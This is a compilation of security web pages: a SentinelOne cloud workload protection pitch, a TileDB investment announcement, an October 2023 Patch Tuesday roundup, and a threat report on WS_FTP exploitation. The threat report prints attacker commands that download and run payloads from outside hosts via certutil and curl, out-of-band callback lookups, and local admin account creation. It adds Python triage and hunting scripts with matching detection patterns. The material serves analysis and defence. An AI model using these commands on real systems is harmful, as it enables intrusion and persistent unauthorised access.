A CWPP can mitigate the impact of DDoS attacks by monitoring network traffic patterns and diverting malicious traffic away from cloud workloads. This ensures that the cloud services remain accessible to legitimate users and maintains service availability.

Cryptominers

Cryptomining malware can be deployed on Docker containers by cyber criminals to mine currencies such as Monero while the resource costs are absorbed by unwitting victims. Cryptocurrency mining malware hinders system performance, increases the compute power cost to businesses, and in some cases can be a precursor of further infections.

A Cloud Workload Protection Platform protects cloud workloads running in Kubernetes from runtime threats and active exploitation associated with cryptominers like XMRig and other malware.

Singularity Cloud | SentinelOne’s Approach to Securing Cloud Workloads

SentinelOne enables organizations to safeguard their endpoints across all their cloud environments, whether public, private, or hybrid. These days, most organizations have thousands of accounts spread over multiple clouds, making cloud infrastructure and workload security a real priority item. SentinelOne’s Cloud Workload Protection Platform, Singularity Cloud, works by extending distributed, autonomous endpoint protection, detection, and response to compute workloads running in both public and private clouds, as well as on-prem data centers.

In today’s threat landscape, Cloud Workload Protection Platforms act as the final line of defense in a multi-layer cloud security strategy. Enterprise businesses and global organizations rely on CWPPs like Singularity Cloud for autonomous, real-time detection as well as remediation of complex threats at the virtual machine (VM) level and Kubernetes pod level, without relying on human analysts to spot them. Even against advanced malware, ransomware, and more, Singularity Cloud’s runtime protection of containerized workloads is able to identify and kill such unauthorized processes.

Conclusion

The power of the cloud provides countless organizations with scalability, flexibility, and cost-efficiency, but it has also carved out avenues through which threat actors can launch their attacks. As businesses rely more heavily on cloud infrastructure, the risks of data breaches, ransomware attacks, supply chain vulnerabilities, and misconfigurations have all escalated in recent years.

To safeguard their digital assets and sensitive information, businesses have turned to cloud workload protection (CWP) strategies. Through a combination of real-time monitoring, threat detection, access control, and vulnerability management, CWP ensures that the dynamic nature of cloud workloads doesn’t become a vulnerability. With the right cloud workload protection solution in place, CWP allows businesses to harness the full potential of cloud computing without compromising their security.

SentinelOne can help organizations improve their cloud security strategy through a combination of real-time detection and response capabilities, autonomous threat hunting, and runtime solutions that can defeat cloud-based threats. Learn more about Singularity Cloud by booking a demo or contacting us today.

EBook: A Cloud Workload Protection Platform Buyer’s Guide
The Cloud Workload Protection Platform Buyer’s Guide is designed to walk you through key considerations when buying cloud workload solutions. We hope it helps to bring clarity to your evaluation and selection process.

S Ventures Invests in TileDB to Bring Simplicity and Performance to Complex Data Platforms

It’s not everyday that an idea emerges from academia with the potential to disrupt existing approaches and technologies. That’s why S Ventures is excited about our recent investment in TileDB, a universal data platform that unifies all types of data (and associated code) along with the complex infrastructure surrounding that data into a single solution. TileDB adapts its internal structure to optimize advanced applications across virtually any data schema.

When most people think of a database, they picture a set of data organized in columns and rows that create a logical relationship, like an Excel spreadsheet that lists sales by product. The data is typically stored as text or numerical data types and users would access and filter the data with a structured query language (or SQL). With the proliferation of the internet, social media, IoT devices, and other digital platforms, the amount of unstructured data being generated is enormous. It’s estimated that unstructured data accounts for more than 80% of the data generated globally.

Unstructured data comes in many formats – from text and images to videos and sensor data. This diversity makes it challenging to process and analyze using traditional database systems. Add in the complexity of new data formats, specialized point tools for visualization, machine learning, and DevOps in a fragmented cloud-native environment (where compute and storage are separated) and it’s no wonder every enterprise has a data problem – rigid access, limited mobility, and lack of holistic governance – and spends inordinate amounts of money and effort building large data engineering teams.

The team at TileDB has an audacious vision to reclaim simplicity and performance in the face of modern challenges, starting with the most challenging use cases in geospatial, life science, and machine learning with some of the world’s most complex enterprises.

“TileDB’s technology simplifies the development and operation of complex data platforms, by effectively replacing ensembles of task-specific databases. We are especially excited to see what this will do for emerging AI systems that rely on rapid access to multi-modal knowledge.” – Gregor Stewart, VP, AI & Machine Learning Engineering, SentinelOne

TileDB accomplishes this with a powerful, universal data structure, called the multi-dimensional array. Arrays can shape-shift to efficiently store and process any kind of data, from tables, to images, genomics, weather, graphs, key-values, point clouds, flat files and more. TileDB allows users to build, maintain and run any sophisticated ETL process, pipeline, workload or query algorithm, inside its serverless distributed computing environment. Keeping data, code and compute in a single place eliminates silos, reduces total cost of ownership and increases productivity and collaboration across teams and individuals.

“As leaders in cybersecurity and its application to machine learning, SentinelOne brings a unique perspective to TileDB. With the investment from S Ventures, we’ll continue to expand the application of our game-changing, array-based technology” – Stavros Papadopoulos, Founder and CEO, TileDB

Please join us in congratulating TileDB on their Series B and learn more about what they are building at tiledb.com.

Patch Tuesday, October 2023 Edition

Microsoft today issued security updates for more than 100 newly-discovered vulnerabilities in its Windows operating system and related software, including four flaws that are already being exploited. In addition, Apple recently released emergency updates to quash a pair of zero-day bugs in iOS.

Apple last week shipped emergency updates in iOS 17.0.3 and iPadOS 17.0.3 in response to active attacks. The patch fixes CVE-2023-42724, which attackers have been using in targeted attacks to elevate their access on a local device.

Apple said it also patched CVE-2023-5217, which is not listed as a zero-day bug. However, as Bleeping Computer pointed out, this flaw is caused by a weakness in the open-source “libvpx” video codec library, which was previously patched as a zero-day flaw by Google in the Chrome browser and by Microsoft in Edge, Teams, and Skype products. For anyone keeping count, this is the 17th zero-day flaw that Apple has patched so far this year.

Fortunately, the zero-days affecting Microsoft customers this month are somewhat less severe than usual, with the exception of CVE-2023-44487. This weakness is not specific to Windows but instead exists within the HTTP/2 protocol used by the World Wide Web: Attackers have figured out how to use a feature of HTTP/2 to massively increase the size of distributed denial-of-service (DDoS) attacks, and these monster attacks reportedly have been going on for several weeks now.

Amazon, Cloudflare and Google all released advisories today about how they’re addressing CVE-2023-44487 in their cloud environments. Google’s Damian Menscher wrote on Twitter/X that the exploit — dubbed a “rapid reset attack” — works by sending a request and then immediately cancelling it (a feature of HTTP/2). “This lets attackers skip waiting for responses, resulting in a more efficient attack,” Menscher explained.

Natalie Silva, lead security engineer at Immersive Labs, said this flaw’s impact to enterprise customers could be significant, and lead to prolonged downtime.

“It is crucial for organizations to apply the latest patches and updates from their web server vendors to mitigate this vulnerability and protect against such attacks,” Silva said. “In this month’s Patch Tuesday release by Microsoft, they have released both an update to this vulnerability, as well as a temporary workaround should you not be able to patch immediately.”

Microsoft also patched zero-day bugs in Skype for Business (CVE-2023-41763) and WordPad (CVE-2023-36563). The latter vulnerability could expose NTLM hashes, which are used for authentication in Windows environments.

“It may or may not be a coincidence that Microsoft announced last month that WordPad is no longer being updated, and will be removed in a future version of Windows, although no specific timeline has yet been given,” said Adam Barnett, lead software engineer at Rapid7. “Unsurprisingly, Microsoft recommends Word as a replacement for WordPad.”

Other notable bugs addressed by Microsoft include CVE-2023-35349, a remote code execution weakness in the Message Queuing (MSMQ) service, a technology that allows applications across multiple servers or hosts to communicate with each other. This vulnerability has earned a CVSS severity score of 9.8 (10 is the worst possible). Happily, the MSMQ service is not enabled by default in Windows, although Immersive Labs notes that Microsoft Exchange Server can enable this service during installation.

Speaking of Exchange, Microsoft also patched CVE-2023-36778, a vulnerability in all current versions of Exchange Server that could allow attackers to run code of their choosing. Rapid7’s Barnett said successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell session.

For a more detailed breakdown on the updates released today, see the SANS Internet Storm Center roundup. If today’s updates cause any stability or usability issues in Windows, AskWoody.com will likely have the lowdown on that.

Please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains

Since September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress Software’s WS_FTP Server against Windows servers running a vulnerable version of the software. The two highest-severity vulnerabilities, CVE-2023-40044 and CVE-2023-42657, were assigned CVSS scores of 10.0 and 9.9 respectively. We observed at least three types of multi-stage attack chain, each beginning with exploitation followed by commands that download a payload from a remote server, often via an IP-literal URL.

This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023. While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineering and Construction, Oil and Natural Gas (ONG), Healthcare, and Nonprofit sectors have been impacted.

Technical Details

Exploitation activity may show up in process logs as commands whose parent process is the IIS worker process (w3wp.exe) running the WS_FTP application pool WSFTPSVR_WTM, for example:

C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l
"webengine4.dll" -a \\.\pipe\iisipme{GUID_String} -h
"C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config" -w "" -m 1
-t 20 -ta 0

There have been several attack chains that follow exploitation of the WS_FTP vulnerability.

Attack Chain 1: Encoded PowerShell & Certutil Deliver Metasploit

The exploit invokes a command that:

  • Checks if the system architecture is 32- or 64-bit: the script uses this information to run PowerShell from the correct path
  • Uses obfuscated strings that disable PowerShell logging for the script’s execution
  • Decodes, extracts, and executes a Base64-encoded, Gzip-compressed string, and launches the decoded values as a new process
Encoded command containing Attack Chain 1

The obfuscated code above contains C# and PowerShell code with the following pieces:

  • l4 Function: Uses .NET reflection to fetch the GetProcAddress and GetModuleHandle methods from the Windows API.
  • pR Function: Sets parameters for the dynamic assembly to run.
  • $dYKA Variable: Decodes the base64-encoded PowerShell code containing a call to certutil to download a payload from an IP-literal URL.
  • $pq5zc Variable: Allocates memory for the shellcode using VirtualAlloc.
  • Copies the shellcode into allocated memory.
  • Creates and executes a new thread for the shellcode to run with all the established parameters.
The C# code responsible for running the certutil.exe call that downloads a payload from a remote server

The new process is certutil.exe with the -urlcache flag, used to download a payload from an IP-literal URL. An example of this command:

/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string}
%TEMP%\{10-length-alpha-string}.exe & start /B
%TEMP%\{same-10-length-alpha-string}.exe
Decoded certutil.exe command that downloads the payload, and launches as a new process

The payload (SHA-1: 83140ae9951b66fba6da07e04bfbba4e9228cbb8) downloaded from the server is categorized as Metasploit stager by detection rules on VirusTotal. In this case, the activity crashed, resulting in the system launching the Windows Error Reporting binary, WerFault.exe. Because we saw additional exploitation attempts several minutes later, we believe this attempt was unsuccessful, leading the actor to try again.
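As an added triage example (not code from the SentinelOne report), the following Python script peels the three layers described above in the order a responder meets them: the -EncodedCommand argument (Base64 over UTF-16LE), the Base64/Gzip-wrapped stage that the outer script feeds to GzipStream and IEX, and the Base64-encoded shellcode inside that stage whose embedded command string carries the certutil -urlcache download. The encoded command it runs on is constructed here with a documentation-range IP (203.0.113.10) and NOP filler in place of real shellcode; the regular expressions and the assumption that the stage is always gzip-compressed are mine, not the actor's.

```python
"""Peel the Attack Chain 1 layering: powershell -e <Base64 UTF-16LE> -> script that
Base64-decodes and gunzips a stage -> stage that Base64-decodes shellcode whose
embedded command string runs certutil -urlcache. Added triage example; the
sample command is constructed (placeholder IP, filler bytes for shellcode)."""
import base64
import gzip
import re

# -e / -enc / -EncodedCommand argument of a PowerShell command line.
_ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Base64 literal handed to [Convert]::FromBase64String(...).
_B64_BLOB = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# certutil cache download of an IP-literal URL, followed by the drop path.
_CERTUTIL = re.compile(
    r"certutil(?:\.exe)?\s+-urlcache\s+(?:-split\s+)?-f\s+"
    r"(https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/\S*)\s+(\S+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Layer 1: the script behind -EncodedCommand is Base64 over UTF-16LE."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def unwrap_gzip_stage(script: str) -> str:
    """Layer 2: Base64-decode the blob in the script and gunzip it (GzipStream)."""
    m = _B64_BLOB.search(script)
    if not m:
        raise ValueError("no FromBase64String blob in outer script")
    raw = base64.b64decode(m.group(1))
    if raw[:2] != b"\x1f\x8b":           # gzip magic; anything else is a different stager
        raise ValueError("inner blob is not gzip-compressed")
    return gzip.decompress(raw).decode("utf-8", errors="replace")


def extract_certutil_download(stage: str) -> tuple:
    """Layer 3: the stage's Base64 blob is the shellcode; its command string is plain ASCII."""
    m = _B64_BLOB.search(stage)
    if not m:
        raise ValueError("no shellcode blob in stage")
    text = base64.b64decode(m.group(1)).decode("latin-1")   # keep every byte, never fail
    c = _CERTUTIL.search(text)
    if not c:
        raise ValueError("no certutil -urlcache download in shellcode")
    return c.group(1), c.group(2)


def triage(cmdline: str) -> dict:
    """Run all three layers and summarise what matters for an IOC hand-off."""
    outer = decode_encoded_command(cmdline)
    stage = unwrap_gzip_stage(outer)
    url, dropped = extract_certutil_download(stage)
    return {"download_url": url, "dropped_file": dropped,
            "uses_virtualalloc": "VirtualAlloc" in stage,
            "outer_uses_iex": bool(re.search(r"\bIEX\b|Invoke-Expression", outer, re.I))}


def build_sample_cmdline() -> str:
    """Constructed stand-in for the actor's command: same three layers, benign contents."""
    cmd = (b"/c certutil -urlcache -f http://203.0.113.10:8080/Qm9ndXNTYW1wbGVQYXRoMQ "
           b"%TEMP%\\wsftptest.exe & start /B %TEMP%\\wsftptest.exe\x00")
    shellcode = b"\x90" * 8 + cmd        # NOPs in place of real machine code
    stage = ('$pq5zc=$l4.Invoke("kernel32.dll","VirtualAlloc");'
             '[Byte[]]$sc=[Convert]::FromBase64String("'
             + base64.b64encode(shellcode).decode() + '");')
    outer = ("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('"
             + base64.b64encode(gzip.compress(stage.encode())).decode()
             + "'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
             "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();")
    return "powershell -nop -w hidden -e " + base64.b64encode(outer.encode("utf-16-le")).decode()


if __name__ == "__main__":
    for k, v in triage(build_sample_cmdline()).items():
        print(f"{k}: {v}")
```

Because the shellcode bytes are decoded as latin-1 rather than UTF-8, a real stager's machine code never raises a decode error and the embedded command string is still found by the regular expression; the gzip magic check keeps the script from silently mis-parsing a stager that uses a different compression or none at all.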

Attack Chain 2: Curl & Live Compilation via cl.exe

Another attack chain uses curl to download a payload that is saved and run as cl.exe, the file name of the Microsoft C/C++ compiler. Whether the file really is the compiler, used to build the final payload at runtime, or simply a binary renamed to blend in could not be confirmed, because the payloads were no longer available at the time of analysis (see below). The attack chain looks like this:

/c cmd.exe /c powershell -command "curl hxxp://34[.]77[.]65[.]112:25565"
/c cmd.exe /C curl 45[.]93[.]138[.]44/cl.exe -o C:/cl.exe
/c curl hxxps://tmpfiles[.]org/dl/2669853/client.txt -o $env:TEMP/cl.exe ;start-process $env:TEMP/cl.exe'
/c curl hxxps://tmpfiles[.]org/dl/2669123/client.txt -o $env:TEMP/cl.exe ;start-process $env:TEMP/cl.exe'
/c cmd.exe /C curl bgvozb1wnz86q952zxjlwusv2m8gw5[.]oastify[.]com
/c curl hxxps://tmpfiles[.]org/dl/2671793/sl.txt -o $env:TEMP/sl.exe ;start-process $env:TEMP/sl.exe'
/c cmd.exe /C curl qzt3iqkb6erl9oohic20f9bal1rsfh[.]oastify[.]com
/c cmd.exe /C C:/cl.exe

At the time of analysis, the tmpfiles[.]org files were no longer available, so we are unable to validate the final payload. The oastify[.]com domain is the default out-of-band domain of Burp Suite’s Collaborator, which is used to detect out-of-band interactions during security testing of web applications and Application Programming Interfaces (APIs).

While this tool can be used for legitimate security testing, we are unable to confirm that this activity came from an offensive security team. However, Assetnote’s vulnerability analysis, which contains a step-by-step walkthrough of exploitation using a ysoserial.net .NET deserialization gadget, uses a lookup to an oastify[.]com subdomain as its proof of exploitation. Defenders can identify these calls by looking for curl or nslookup invocations that target a subdomain of oastify[.]com.

Attack Chain 3: Executables & Local Account Activity

This attack chain employed a number of Windows executables housed in the server’s ProgramData path. While there is a call to PowerShell, this attack chain does not use any scripts; instead, each of the commands below is invoked by a series of executables with short names consisting of a letter and often one digit, such as n1.exe, n2.exe and s.exe. We were unable to obtain these binaries for analysis.

-i -c "cmd.exe /c c:\programdata\xmpp.exe"
-i -c "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"
-i -c "cmd /c net user temp p@ssw0rd123 /add"
-i -c "cmd /c whoami"
-i -c c:\programdata\xmpp.exe ls c:\programdata
C:\programdata\ft.exe
/c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com

The binary xmpp.exe is signed by SimpleHelp, a vendor of remote management software. xmpp.exe runs before each subsequent command, so the actor is likely using it as a remote access tool through which the commands are issued.

The actor attempted to create a user named temp with the password p@ssw0rd123 and add it to the Administrators group. Note that net user and net localgroup without the /domain switch operate on the server’s local accounts database, not Active Directory, so a successful run would yield a local administrator on the WS_FTP host rather than a domain account; that is still privilege escalation on the compromised server. This was followed by several attempts to create the same user without adding it to the Administrators group, and lastly a call to whoami, which displays the user of the current console session. Based on this order of events, the attempt to create an administrative user likely failed. Because the activity stops after the whoami command, the plain user creation likely succeeded.

Conclusion

Organizations using Progress’ WS_FTP product should update immediately or take impacted systems offline. These attacks are likely opportunistic, with actors scanning the internet for vulnerable systems.

When comparing this campaign to the MOVEit Transfer mass exploitation by the Clop ransomware group in June, there is a silver lining: the Censys research team found far fewer WS_FTP instances exposed to the internet than the number of vulnerable MOVEit Transfer instances that were exposed at the time.

The researchers who identified these vulnerabilities noted that they looked at more file transfer products because of the previous findings in MOVEit Transfer. Based on this, we can assume that more vulnerabilities will be identified and weaponized as researchers focus on this product suite, with extra attention given to Progress based on the current and previous success it has yielded for vulnerability researchers.

Indicators of Compromise

Network Indicators – URLs
hxxp://34[.]77[.]65[.]112:25565
hxxp://103[.]163[.]187[.]12:8080/3P37p073LKuQjOE64pjEVw
hxxp://103[.]163[.]187[.]12:8080/c8e3vG0e3TMiqcjcZOXhhA
hxxp://103[.]163[.]187[.]12:8080/cz3eKnhcaD0Fik7Eexo66A
hxxp://103[.]163[.]187[.]12:8080/Sw8J6d3NVuvrBiTCXrg4Og
hxxp://103[.]163[.]187[.]12:8080/xkJ5de2brMfvCNNnBoRRAg
hxxp://141[.]255[.]167[.]250:8081/o1X7qlIaYzSmCj[.]hta
hxxp://176[.]105[.]255[.]46:8080/aqmCG0mZlo_xnZRAWbz6MQ
hxxp://176[.]105[.]255[.]46:8080/OFmLqOxFRIkoENjCZsC7OQ
hxxp://176[.]105[.]255[.]46:8080/Rn0KQbPo22laaUbKGy30sg
hxxp://81[.]19[.]135[.]226:8080/_1TZ--18Hpqm06wvtjLMAg
hxxps://filebin[.]net/soa40iww2w8jhgnd/svchostt[.]dll
hxxps://tmpfiles[.]org/dl/2669123/client[.]txt
hxxps://tmpfiles[.]org/dl/2669853/client[.]txt
hxxps://tmpfiles[.]org/dl/2671793/sl[.]txt
45[.]93[.]138[.]44/cl[.]exe

Network Indicators – Domains
2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com
bgvozb1wnz86q952zxjlwusv2m8gw5[.]oastify[.]com
qzt3iqkb6erl9oohic20f9bal1rsfh[.]oastify[.]com

Network Indicators – IPs
34[.]77[.]65[.]112
45[.]93[.]138[.]44
81[.]19[.]135[.]226
103[.]163[.]187[.]12
141[.]255[.]167[.]250
176[.]105[.]255[.]46

File Hashes – SHA-1
1d41e0783c523954ad12d950c3805762a1218ba6
1d7b08bf5ca551272066f40d8d55a7c197b2f590
32548a7ef421e8e838fa31fc13723d44315f1232
3fe67f2c719696b7d02a3c648803971d4d1fd18c
40b2d3a6a701423412bb93b7c259180eb1221d68
65426816ef29c736b79e1969994adf2e74b10ad8
790dcfb91eb727b04d348e2ed492090d16c6dd3e
83140ae9951b66fba6da07e04bfbba4e9228cbb8
83e6ede4c5f1c5e4d5cd12242b3283e9c48eea7e
8c14a4e7cee861b2fad726fc8dd0e0ae27164890
8dbca2f55c2728b1a84f93141e0b2a5b87fa7d35
923fd8fb3ddc1358cc2791ba1931bb4b29580bb6
98321d034ddc77fe196c6b145f126b0477b32db9
b4a5bf6c9f113165409c35726aec67ff66490787
b70aa1d07138b5cae8dd95feba9189f1238ee158
d00169f5eff9e0f2b5b1d473c0ee4fe9a3d8980e
d669b3977ebebf7611dd2cb1d09c31b3f506e9bd
e5ac227f143ec3f815e475c0b4f4f852565e1e76
f045a41def1752e7f8ef38d4ce1f7bd5e01490fc

SentinelOne Hunting Query

endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') 
AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains 
('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')
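The hunting query above, expressed as Python over process-creation events, as an added example that is not part of the report and not the vendor's query engine. The event records are constructed (documentation-range IP, made-up Collaborator subdomain) to mirror the command lines shown in the three attack chains, and the field names (parent_name, parent_cmdline, name, cmdline) are an assumed generic EDR export. It adds the net user / net localgroup and oastify[.]com checks from Attack Chains 2 and 3, because the app-pool rule alone misses the Attack Chain 3 commands: they were launched through xmpp.exe rather than directly under w3wp.exe.

```python
"""Hunt for the WS_FTP post-exploitation patterns described in the report over
process-creation events. Added example with constructed events; field names are
an assumed generic EDR schema, not the vendor's."""
import re

# Child binaries named in the report's hunting query.
LOLBINS = {"certutil.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "curl.exe", "wmic.exe", "nslookup.exe", "ping.exe", "whoami.exe"}
APP_POOL = "WSFTPSVR_WTM"
# Burp Collaborator style callback: long random label under oastify.com.
OAST_RE = re.compile(r"\b[a-z0-9]{20,}\.oastify\.com\b", re.IGNORECASE)
# net user <name> <password> /add without /domain creates a local account.
NET_USER_ADD_RE = re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b(?!\s*/domain)", re.IGNORECASE)
# net localgroup administrators <name> /add puts it in the local Administrators group.
LOCAL_ADMIN_RE = re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.IGNORECASE)


def evaluate(event: dict) -> list:
    """Return the names of the detections an event trips, in a fixed order."""
    hits = []
    parent = event.get("parent_name", "").lower()
    child = event.get("name", "").lower()
    cmd = event.get("cmdline", "")
    # Rule 1: the WS_FTP IIS app pool spawning a LOLBin (the report's query).
    if parent == "w3wp.exe" and APP_POOL in event.get("parent_cmdline", "") and child in LOLBINS:
        hits.append("wsftp_apppool_spawns_lolbin")
    # Rule 2: out-of-band callback to a Collaborator subdomain (curl or nslookup).
    if OAST_RE.search(cmd):
        hits.append("oast_callback_domain")
    # Rule 3: local account creation and local Administrators group addition.
    if NET_USER_ADD_RE.search(cmd):
        hits.append("local_user_add")
    if LOCAL_ADMIN_RE.search(cmd):
        hits.append("local_admin_group_add")
    return hits


def hunt(events) -> dict:
    """Map event id -> detections for every event that trips at least one rule."""
    results = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            results[event["id"]] = hits
    return results


# Parent command line of the WS_FTP app pool worker, as shown in the report.
W3WP = 'C:\\Windows\\SysWOW64\\inetsrv\\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll"'

SAMPLE_EVENTS = [  # constructed records; 203.0.113.10 and the oastify label are placeholders
    {"id": 1, "parent_name": "w3wp.exe", "parent_cmdline": W3WP, "name": "cmd.exe",
     "cmdline": "/c certutil -urlcache -f http://203.0.113.10:8080/AAAAAAAAAAAAAAAAAAAAAA "
                "%TEMP%\\abcdefghij.exe & start /B %TEMP%\\abcdefghij.exe"},
    {"id": 2, "parent_name": "w3wp.exe", "parent_cmdline": W3WP, "name": "cmd.exe",
     "cmdline": "/c cmd.exe /C curl abcdefghijklmnopqrst0123456789.oastify.com"},
    # Attack Chain 3 shape: launched through the SimpleHelp xmpp.exe, so the parent is not w3wp.exe
    {"id": 3, "parent_name": "xmpp.exe", "parent_cmdline": "c:\\programdata\\xmpp.exe",
     "name": "cmd.exe",
     "cmdline": "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"},
    # Benign noise: a different app pool and an ordinary interactive shell.
    {"id": 4, "parent_name": "w3wp.exe",
     "parent_cmdline": 'C:\\Windows\\System32\\inetsrv\\w3wp.exe -ap "DefaultAppPool" -v "v4.0"',
     "name": "conhost.exe", "cmdline": "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"},
    {"id": 5, "parent_name": "explorer.exe", "parent_cmdline": "C:\\Windows\\explorer.exe",
     "name": "cmd.exe", "cmdline": "cmd /c whoami"},
]


if __name__ == "__main__":
    for event_id, hits in hunt(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Event 3 is the one to watch: it trips only the account rules, so a hunt that keys solely on the w3wp.exe parent, as the query above does, would not surface the account creation once the actor has moved to a remote access tool. Pairing the parent-based rule with command-line rules for local account changes and out-of-band DNS callbacks covers all three chains seen here.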